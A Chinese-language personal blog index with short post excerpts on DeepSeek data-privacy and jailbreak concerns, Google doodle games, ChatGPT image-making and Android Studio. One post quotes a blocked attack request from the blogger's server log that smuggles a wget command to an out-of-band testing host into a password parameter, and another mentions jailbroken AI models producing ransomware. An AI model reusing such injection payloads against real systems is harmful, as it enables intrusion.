DeepSeek恐將用戶輸入資料傳至中國

有許多資安專家指出 DeepSeek若進行越獄(修改使用權限), 可使這款 AI模型能產生惡意輸出的內容, 例如開發勒索軟體、偽造幾可亂真的敏感資訊, 另外也有人指出 DeepSeek疑似與中國國營電信業者串連, 擅自建置能將用戶資料傳送給中國移動電信, 而可能讓中國政府直接存取相關資料, 不只可能對使用者收集帳密資料、聊天內容、上傳的檔案, 甚至還會進行即時監控特定使用者活動

2025 農曆新年 Google小遊戲 貪食蛇

貪食蛇, 舊手機時代的懷舊遊戲搬上網頁, 隨著不同的設定, 遊戲也有不同的變化

使用ChatGPT製作新年賀圖

話先說在前頭, 可能是我輸入的內容及關鍵字不夠詳細, 不過還是有畫出來(雖然跟我想像的結果差很多), 最後還是要用工具編輯修改, 所以不要太期待叫 AI 畫圖😆

1. 第一張是很有過年氣氛, 但感覺太複雜了

2. 第二張叫它改變畫風, 製作可愛一點(不過為什麼都喜歡畫眼鏡蛇?), 文字部分有待改善

3. 第三張不知所云...

4. 免費版的 ChatGPT似乎有每日製圖限制, 這張是第二天再重畫的, 有接近我想要的感覺, 但寫什麼東西看不懂, 依舊喜歡畫眼鏡蛇

5. 同上一張還是看不懂寫什麼東西 😂

ChatGPT網站掛了？

早上要來跟我的 AI老師學習時, 發現它居然不在家？

從 Web Log 學習系統漏洞 92

這幾天來上萬次來自美國紐約攻擊的傢伙, 不過都擋下來了

其中一段很有意思:

107.173.254.12 - - [02/Dec/2024:22:53:23 +0800] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://ct6s3r6bldaem9lrvt7gznx5rmwzoep1e.oast.online) HTTP/1.1" 403 240 "-" "-"

估狗了一下關鍵字 oast

OAST, Out-of-band application security testing(帶外應用程式安全測試), 這是一個使用外部伺服器來查看其他不可見的漏洞, 它的引入是為了進一步改進 DAST(動態應用程式安全測試)模型

再使用 Log其中的連結連到網站

上面寫到 Interactsh是用於偵測帶外互動的開源工具, 它是一種旨在檢測導致外部互動的漏洞的工具 (這傢伙幫忙檢查我網站的漏洞準備入侵？)

試用Android Studio

Android Studio是由 Google推出的一款 Android應用程式開發工具, 基於 IntelliJ IDEA平台打造, 它是專為 Android開發者設計的整合開發環境(IDE), 提供了許多功能來協助快速開發 Android應用程式, 支援多種語言(如 Java、Kotlin)並與 Android SDK整合, 最近想來學學新東西於是就去下載回來玩玩

1. 搜尋 Android Studio後連至官網下載

2. 安裝前注意系統最低需求

w-studio.idv.tw

Google小遊戲 - 2024萬聖節, Halloween 2024

Google2024萬聖節小遊戲, 與之前用手勢打退鬼魂一樣, 用滑鼠有點難控制